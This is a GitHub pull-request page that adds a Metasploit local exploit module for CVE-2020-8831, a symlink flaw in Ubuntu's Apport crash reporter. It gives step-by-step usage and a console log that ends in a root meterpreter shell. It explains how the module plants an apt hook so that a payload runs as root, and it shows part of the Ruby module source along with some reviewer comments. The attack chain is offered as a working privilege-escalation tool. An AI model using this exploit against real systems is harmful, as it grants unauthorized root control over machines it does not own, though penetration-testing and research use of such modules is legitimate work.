-
Notifications
You must be signed in to change notification settings - Fork 14.9k
Add Apport Symlink Hijacking: CVE-2020-8831 #20037
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: master
Are you sure you want to change the base?
Changes from all commits
edc187a
6854dc0
f8f0ac5
9ffec60
6112b1e
a1dfc8a
4838131
417c1bb
18a94bb
8cef31f
68de77e
689bfdb
6055625
68683c3
3868607
1bd3a4a
6d52e90
ec93425
2417f58
631bdf6
31bfb04
cc7c14e
43cdca1
8735ab6
fce7505
0090f14
eac2163
c70e2f6
a28e505
0d510d6
65b6e70
7837784
2d3130c
90c4e74
5163148
d041181
8039309
658ae39
428a69f
71ab951
dfebd0a
6cec633
7436864
6f1097b
1401b98
e4c7ce9
6a6368a
8b44923
ce29f87
7b11250
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,101 @@ | ||
| ## Description | ||
|
|
||
| Apport is a utility for writing crash reports, and in versions <= 2.20.11 there | ||
| is a vulnerable `check_lock` function which suffers from the 'confused deputy | ||
| problem' and will inadvertently follow symbolic links from `/var/lock/apport/` | ||
| when writing lock files. Essentially, this vulnerability allows an attacker to | ||
| arbitrarily create root-owned, world-readable, writable, and executable files by | ||
| creating a symbolic link to `/var/lock/apport/` and then triggering a crash that | ||
| will be logged by apport. | ||
|
|
||
| To achieve privilege escalation, this module first creates a symlink from `/var/lock/ | ||
| apport/` to `/etc/apt/apt.conf.d/`. It then triggers a crash, causing a | ||
| root-owned, world-readable, writable, and executable file, `/etc/apt/apt.conf.d/lock`, | ||
| to be written. Next, the module writes a payload, which by default is written to | ||
| `/home/ubuntu/`. | ||
|
|
||
| An apt hook is a way of prepending commands to apt package operations. Using the | ||
| `/etc/apt/apt.conf.d/lock` file, we write our own apt hooks. This module will | ||
| trigger the payload on the following apt commands: `apt-get upgrade`, | ||
| `apt-get update`, and `apt-get install`. Once one of these commands is run, a new | ||
| root session will be spawned. | ||
|
|
||
| ## Vulnerable Application | ||
|
|
||
| Apport versions <= 2.20.11 are vulnerable to symlink hijacking due to a vulnerable | ||
| `check_lock` function which will inadvertently follow symbolic links from `/var/lock/ | ||
| apport/`. This package can be installed with `sudo dpkg -i apport_2.20.11-0ubuntu21_all.deb`. | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Start `msfconsole` | ||
| 2. Get a session | ||
| 3. Do: `use exploit/linux/local/cve_2020_8831_apport_symlink_privesc` | ||
| 4. Do: `set SESSION [SESSION]` | ||
| 5. Do: `check` | ||
| 6. Do: `run` | ||
| 7. You should get a new root session | ||
|
|
||
| ## Options | ||
|
|
||
| ### SESSION | ||
|
|
||
| Which session to use, which can be viewed with `sessions` | ||
|
|
||
| ### PAYLOAD_FILENAME | ||
|
|
||
| Name of the payload file which will be executed by the apt hook. Is random by | ||
| default. | ||
|
|
||
| ### HOOKPATH | ||
|
|
||
| Path to the apt configuration directory, default is `/etc/apt/apt.conf.d/` | ||
|
|
||
| ### WRITABLE_DIR | ||
|
|
||
| A directory we can write to, this is where the payload file will be written to. | ||
| Default is `/home/ubuntu`. | ||
|
|
||
| ## Advanced Options | ||
|
|
||
| ### REMOVE_LOCK_DIR | ||
|
|
||
| When set to true the `/var/lock/apport/` directory will be removed if it already | ||
| exists. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| msf6 exploit(linux/local/cve_2020_8831_apport_symlink_privesc) > use exploit/multi/handler | ||
| [*] Using configured payload linux/x86/meterpreter/bind_tcp | ||
| msf6 exploit(multi/handler) > set rhost 18.212.162.161 | ||
| rhost => 18.212.162.161 | ||
| msf6 exploit(multi/handler) > | ||
| rmsf6 exploit(multi/handler) > run | ||
|
|
||
| [*] Started bind TCP handler against 18.212.162.161:5555 | ||
| ^C[-] Exploit failed [user-interrupt]: Interrupt | ||
| [-] run: Interrupted | ||
| msf6 exploit(multi/handler) > set lport 7777 | ||
| lport => 7777 | ||
| runmsf6 exploit(multi/handler) > run | ||
|
|
||
| [*] Started bind TCP handler against 18.212.162.161:7777 | ||
|
Comment on lines
+80
to
+83
|
||
| [*] Sending stage (1017704 bytes) to 18.212.162.161 | ||
| [-] Meterpreter session 4 is not valid and will be closed | ||
| [*] 18.212.162.161 - Meterpreter session 4 closed. | ||
| ^C[-] Exploit failed [user-interrupt]: Interrupt | ||
| [-] run: Interrupted | ||
| msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp | ||
| payload => linux/x64/meterpreter/bind_tcp | ||
| rmsf6 exploit(multi/handler) > run | ||
|
|
||
| [*] Started bind TCP handler against 18.212.162.161:7777 | ||
| [*] Sending stage (3045380 bytes) to 18.212.162.161 | ||
| [*] Meterpreter session 5 opened (192.168.0.239:57606 -> 18.212.162.161:7777) at 2025-10-14 15:49:00 -0400 | ||
| meterpreter > shell | ||
| Process 5791 created. | ||
| Channel 1 created. | ||
| whoami | ||
| root | ||
| ``` | ||
| Original file line number | Diff line number | Diff line change | ||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| @@ -0,0 +1,196 @@ | ||||||||||||||||||||||
| ## | ||||||||||||||||||||||
| # This module requires Metasploit: https://metasploit.com/download | ||||||||||||||||||||||
| # Current source: https://github.com/rapid7/metasploit-framework | ||||||||||||||||||||||
| ## | ||||||||||||||||||||||
|
|
||||||||||||||||||||||
| class MetasploitModule < Msf::Exploit::Local | ||||||||||||||||||||||
| Rank = NormalRanking | ||||||||||||||||||||||
|
|
||||||||||||||||||||||
| prepend Msf::Exploit::Remote::AutoCheck | ||||||||||||||||||||||
| include Msf::Post::Linux::System | ||||||||||||||||||||||
| include Msf::Post::Linux::Kernel | ||||||||||||||||||||||
| include Msf::Post::File | ||||||||||||||||||||||
| include Msf::Exploit::EXE | ||||||||||||||||||||||
|
|
||||||||||||||||||||||
| def initialize(info = {}) | ||||||||||||||||||||||
| super( | ||||||||||||||||||||||
| update_info( | ||||||||||||||||||||||
| info, | ||||||||||||||||||||||
| 'Name' => 'Apport Symlink Hijacking Privilege Escalation', | ||||||||||||||||||||||
| 'Description' => %q{ | ||||||||||||||||||||||
| On some Ubuntu releases such as Xenial Xerus 16.04.7 the Apport versions <= 2.20.11 are vulnerable | ||||||||||||||||||||||
| to symlink hijacking. Following a crash Apport will write reports to /var/lock/apport/lock, | ||||||||||||||||||||||
| an attacker who can create a symlink to a privileged directory via /var/lock/apport will be | ||||||||||||||||||||||
| able to create files with global 0777 permissions. This module exploits this weakness by creating a | ||||||||||||||||||||||
| symbolic link to /etc/apt/apt.conf.d/ to write a hook to apt-get which will trigger a root shell on the target. | ||||||||||||||||||||||
| }, | ||||||||||||||||||||||
| 'License' => MSF_LICENSE, | ||||||||||||||||||||||
| 'Author' => [ | ||||||||||||||||||||||
| 'Maximilien Bourgeteau', # Discovery | ||||||||||||||||||||||
| 'gardnerapp', # Team Wild Star | ||||||||||||||||||||||
| 'bwatters-r7' # code review & testing | ||||||||||||||||||||||
| ], | ||||||||||||||||||||||
| 'References' => [ | ||||||||||||||||||||||
| [ | ||||||||||||||||||||||
| ['URL', 'https://nostarch.com/zero-day'], # pg. 59 | ||||||||||||||||||||||
| ['URL', 'https://ubuntu.com/security/CVE-2020-8831'], | ||||||||||||||||||||||
| ['URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1862348'], | ||||||||||||||||||||||
| ['CVE', '2020-8831'], | ||||||||||||||||||||||
| ] | ||||||||||||||||||||||
|
Comment on lines
+34
to
+39
|
||||||||||||||||||||||
| [ | |
| ['URL', 'https://nostarch.com/zero-day'], # pg. 59 | |
| ['URL', 'https://ubuntu.com/security/CVE-2020-8831'], | |
| ['URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1862348'], | |
| ['CVE', '2020-8831'], | |
| ] | |
| ['URL', 'https://nostarch.com/zero-day'], # pg. 59 | |
| ['URL', 'https://ubuntu.com/security/CVE-2020-8831'], | |
| ['URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1862348'], | |
| ['CVE', '2020-8831'], |
Copilot
AI
Apr 16, 2026
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Typo in comment: "creat" should be "create".
| # this will creat a world rwx /etc/apt/apt.conf.d/lock owned by root | |
| # this will create a world rwx /etc/apt/apt.conf.d/lock owned by root |
Uh oh!
There was an error while loading. Please reload this page.